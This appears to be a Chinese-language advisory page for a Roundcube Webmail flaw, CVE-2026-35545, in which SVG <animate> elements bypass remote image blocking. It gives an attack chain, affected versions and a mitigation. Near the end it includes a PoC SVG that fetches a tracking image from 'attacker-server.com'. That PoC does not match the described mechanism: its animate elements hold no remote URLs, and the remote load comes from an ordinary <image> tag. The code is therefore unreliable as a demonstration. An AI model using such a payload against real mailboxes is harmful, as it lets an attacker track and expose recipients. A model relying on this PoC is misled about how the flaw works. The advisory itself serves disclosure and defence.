CVE-2026-35545 CVSS 5.3 中危

CVE-2026-35545 Roundcube远程图像拦截绕过漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35545

漏洞类型

安全机制绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Roundcube Webmail

漏洞概述

Roundcube Webmail 1.5.15和1.6.15之前的版本存在漏洞，远程图像拦截功能可被绕过。攻击者通过构造包含特定SVG内容的电子邮件，利用animate元素及特定属性触发拦截失效。该漏洞可能导致敏感信息泄露或访问控制机制失效，影响用户数据安全，建议管理员及时更新系统。

技术细节

该漏洞源于Roundcube Webmail在处理HTML邮件时，对SVG内容的过滤机制存在逻辑缺陷。尽管系统启用了远程图像拦截功能以保护用户隐私，但未能正确识别和拦截SVG内部特定的`<animate>`元素。攻击者可以精心构造恶意SVG代码，将`attributeName`属性设置为`fill`、`filter`或`stroke`。当受害者在Webmail界面预览或打开邮件时，这些恶意SVG元素会绕过现有的拦截逻辑，自动加载远程资源。这种行为直接导致隐私保护机制失效，攻击者可借此确认邮箱活跃状态或进一步窃取用户信息，对系统安全构成威胁。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意SVG内容的电子邮件，SVG中嵌入了带有特定属性的animate元素。

STEP 2

步骤2

攻击者将带有恶意载荷的邮件发送给运行易受攻击版本Roundcube的目标用户。

STEP 3

步骤3

目标用户在Webmail界面预览或打开该电子邮件。

STEP 4

步骤4

Roundcube的远程图像拦截机制未能识别SVG中的animate威胁，允许其执行。

STEP 5

步骤5

SVG内容触发，绕过拦截并加载攻击者控制的远程资源，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-35545: SVG Remote Image Bypass -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <!-- Use animate element with attributeName to bypass filters -->
  <rect width="100" height="100">
    <animate attributeName="fill" values="red;blue" dur="1s" />
    <animate attributeName="filter" from="" to="url(#fake)" />
    <animate attributeName="stroke" from="black" to="red" />
  </rect>
  
  <!-- Attempt to load remote image (usually blocked, but bypassed here) -->
  <image href="http://attacker-server.com/track.png" width="50" height="50" />
</svg>

影响范围

Roundcube Webmail < 1.5.15

Roundcube Webmail < 1.6.15

防御指南

临时缓解措施

建议用户在升级前暂时禁用HTML邮件的自动显示，仅查看纯文本内容，或者加强邮件网关的过滤规则以拦截包含特定SVG元素的邮件内容。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表